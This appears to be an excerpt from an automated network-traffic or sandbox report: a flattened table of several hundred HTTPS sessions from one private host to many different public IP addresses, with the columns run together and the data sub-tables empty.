                                        19264192.168.2.1341778175.204.18.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19265192.168.2.1335588175.170.209.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19266192.168.2.133903851.161.169.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19267192.168.2.134617463.105.35.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19268192.168.2.1355496123.100.114.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19269192.168.2.1333562204.168.255.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19270192.168.2.1336856221.67.136.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19271192.168.2.135368843.19.159.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19272192.168.2.134654225.189.195.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19273192.168.2.1358580169.143.238.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19274192.168.2.1360240216.24.74.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19275192.168.2.136040296.4.198.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19276192.168.2.1336466136.16.237.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19277192.168.2.1348784101.223.83.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19278192.168.2.135129286.187.254.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19279192.168.2.1342094113.124.193.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19280192.168.2.1334322154.34.50.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19281192.168.2.1356392164.210.101.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19282192.168.2.135757053.185.183.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19283192.168.2.1337266174.248.49.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19284192.168.2.133590645.254.152.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19285192.168.2.1353214165.27.49.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19286192.168.2.1357760119.242.158.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19287192.168.2.1357884178.228.166.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19288192.168.2.136011481.188.135.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19289192.168.2.1332882186.149.188.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19290192.168.2.1342656152.45.206.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19291192.168.2.1352376122.184.150.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19292192.168.2.134509463.4.86.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19293192.168.2.135958048.225.146.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19294192.168.2.1352416196.25.6.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19295192.168.2.1336670117.39.106.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19296192.168.2.135397662.68.47.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19297192.168.2.134469446.241.247.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19298192.168.2.1333618201.224.127.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19299192.168.2.134054465.21.143.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19300192.168.2.134604020.211.43.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19301192.168.2.134946035.120.147.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19302192.168.2.135061467.201.239.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19303192.168.2.134255490.167.67.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19304192.168.2.135870812.76.245.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19305192.168.2.1342848182.193.83.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19306192.168.2.1354696162.8.59.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19307192.168.2.134269293.248.54.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19308192.168.2.1359170196.23.243.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19309192.168.2.133397044.127.222.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19310192.168.2.1349036153.14.76.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19311192.168.2.1333068184.162.241.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19312192.168.2.133686478.126.85.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19313192.168.2.1360738204.31.5.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19314192.168.2.1350588116.206.83.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19315192.168.2.134032883.167.226.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19316192.168.2.134177497.97.215.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19317192.168.2.1352486210.143.203.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19318192.168.2.135533467.157.211.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19319192.168.2.1350422159.128.164.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19320192.168.2.1349544116.0.255.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19321192.168.2.1342254201.112.238.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19322192.168.2.1338106105.165.131.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19323192.168.2.134319484.213.86.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19324192.168.2.134323844.169.138.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19325192.168.2.1337490152.158.63.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19326192.168.2.1344660190.197.232.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19327192.168.2.1358160157.14.221.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19328192.168.2.1350466135.96.234.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19329192.168.2.1339132182.243.232.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19330192.168.2.1350826221.50.216.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19331192.168.2.134075831.110.244.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19332192.168.2.1352610105.128.163.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19333192.168.2.1351348105.52.69.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19334192.168.2.1346220181.49.152.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19335192.168.2.134709084.177.203.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19336192.168.2.134870496.136.191.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19337192.168.2.1359568194.252.161.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19338192.168.2.135378441.18.246.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19339192.168.2.133489463.254.71.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19340192.168.2.134422862.217.25.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19341192.168.2.1352640193.207.9.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19342192.168.2.135906446.224.197.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19343192.168.2.1355724131.228.36.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19344192.168.2.135474285.25.174.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19345192.168.2.1353384165.194.213.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19346192.168.2.13410861.25.123.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19347192.168.2.133746839.225.50.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19348192.168.2.1359626141.141.168.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19349192.168.2.135170027.132.92.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19350192.168.2.1333828219.27.252.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19351192.168.2.1335068150.116.135.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19352192.168.2.1333482139.103.90.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19353192.168.2.134412884.9.223.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19354192.168.2.135292667.94.252.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19355192.168.2.1350806204.116.25.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19356192.168.2.133533672.209.56.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19357192.168.2.1347830152.227.2.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19358192.168.2.135544062.60.217.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19359192.168.2.133422842.6.247.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19360192.168.2.1346886122.200.214.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19361192.168.2.135355266.118.217.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19362192.168.2.1337214166.248.226.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19363192.168.2.1338968125.156.151.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19364192.168.2.134476292.67.217.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19365192.168.2.1343998154.76.115.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19366192.168.2.1350800208.159.64.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19367192.168.2.134213275.46.114.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19368192.168.2.135736289.164.145.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19369192.168.2.1335524199.99.230.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19370192.168.2.1360900203.223.216.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19371192.168.2.1352860142.234.52.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19372192.168.2.133836625.82.35.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19373192.168.2.1357002158.169.28.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19374192.168.2.135794094.226.216.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19375192.168.2.1354448198.96.188.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19376192.168.2.133888874.99.39.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19377192.168.2.133605651.116.247.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19378192.168.2.1345332104.123.188.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19379192.168.2.134813868.62.141.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19380192.168.2.1352474195.227.191.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19381192.168.2.1356246166.91.8.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19382192.168.2.1337318190.167.82.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19383192.168.2.135042475.159.18.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19384192.168.2.134295088.200.103.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19385192.168.2.1338056123.186.217.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19386192.168.2.1358128205.53.159.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19387192.168.2.135834073.146.27.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19388192.168.2.1341134159.168.194.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19389192.168.2.134754877.72.45.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19390192.168.2.133918832.48.80.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19391192.168.2.1356546178.253.49.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19392192.168.2.135531025.58.225.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19393192.168.2.134131635.145.79.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19394192.168.2.135920420.156.168.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19395192.168.2.1351858113.223.61.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19396192.168.2.133684259.194.241.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19397192.168.2.133716631.206.31.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19398192.168.2.1340482163.4.204.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19399192.168.2.1342086147.126.58.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19400192.168.2.1352688151.251.166.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19401192.168.2.135482874.38.5.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19402192.168.2.1342520189.73.111.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19403192.168.2.1337436144.193.216.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19404192.168.2.1342182116.45.196.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19405192.168.2.134286289.53.185.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19406192.168.2.134616063.20.100.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19407192.168.2.1353904164.130.46.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19408192.168.2.1360828123.235.167.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19409192.168.2.1342456153.91.147.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19410192.168.2.1334372162.242.56.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19411192.168.2.1360674195.20.52.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19412192.168.2.1337412209.112.242.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19413192.168.2.1341168192.125.235.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19414192.168.2.1335046146.42.24.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19415192.168.2.134757282.153.49.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19416192.168.2.133734413.44.147.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19417192.168.2.1352804177.32.147.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19418192.168.2.1354960124.253.120.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19419192.168.2.13425928.89.241.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19420192.168.2.1340516141.91.239.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19421192.168.2.133612675.74.244.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19422192.168.2.1338308100.14.231.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19423192.168.2.1337256148.145.204.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19424192.168.2.133572682.137.240.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19425192.168.2.133536872.105.195.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19426192.168.2.1336068203.13.132.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19427192.168.2.134767293.156.4.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19428192.168.2.133606282.220.90.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19429192.168.2.1334036169.19.147.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19430192.168.2.1348044130.248.176.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19431192.168.2.1360824184.205.13.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19432192.168.2.133716251.253.170.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19433192.168.2.1350364123.88.228.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19434192.168.2.1338106179.147.85.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19435192.168.2.1356410195.203.186.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19436192.168.2.134937469.60.40.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19437192.168.2.1340788180.14.64.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19438192.168.2.1359316194.236.107.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19439192.168.2.135380037.104.132.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19440192.168.2.1354598185.155.159.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19441192.168.2.1348398139.45.23.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19442192.168.2.1356698206.148.106.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19443192.168.2.1335132199.120.117.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19444192.168.2.133752823.24.92.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19445192.168.2.1340720194.108.124.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19446192.168.2.1355826132.94.218.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19447192.168.2.1334554209.89.55.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19448192.168.2.1340080140.156.44.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19449192.168.2.1353088193.171.234.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19450192.168.2.1355626109.76.10.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19451192.168.2.1354488149.197.75.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19452192.168.2.134742062.84.77.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19453192.168.2.134685483.68.205.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19454192.168.2.135976662.159.165.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19455192.168.2.1345788101.239.133.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19456192.168.2.1360146103.39.126.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19457192.168.2.1334144216.133.61.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19458192.168.2.1344054200.214.17.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19459192.168.2.1350668163.64.32.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19460192.168.2.1351344143.13.159.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19461192.168.2.135491891.228.134.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19462192.168.2.1357722161.124.117.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19463192.168.2.1346766217.240.68.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19464192.168.2.13568345.128.17.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19465192.168.2.135803469.164.167.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19466192.168.2.13354269.96.145.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19467192.168.2.1357846167.240.161.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19468192.168.2.1356654151.247.218.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19469192.168.2.1342266115.197.245.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19470192.168.2.1346810156.19.171.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19471192.168.2.135643817.87.97.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19472192.168.2.1350532104.95.79.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19473192.168.2.133582618.243.238.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19474192.168.2.1357482164.0.6.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19475192.168.2.1335942156.121.233.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19476192.168.2.1336338179.47.35.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19477192.168.2.1357200195.95.178.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19478192.168.2.1338530138.128.143.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19479192.168.2.1356150112.60.150.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19480192.168.2.1342950143.14.98.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19481192.168.2.1349440206.133.157.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19482192.168.2.1339640199.150.253.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19483192.168.2.134107640.222.248.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19484192.168.2.1355696105.26.17.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19485192.168.2.1344538107.48.4.112443
                                        TimestampBytes transferredDirectionData


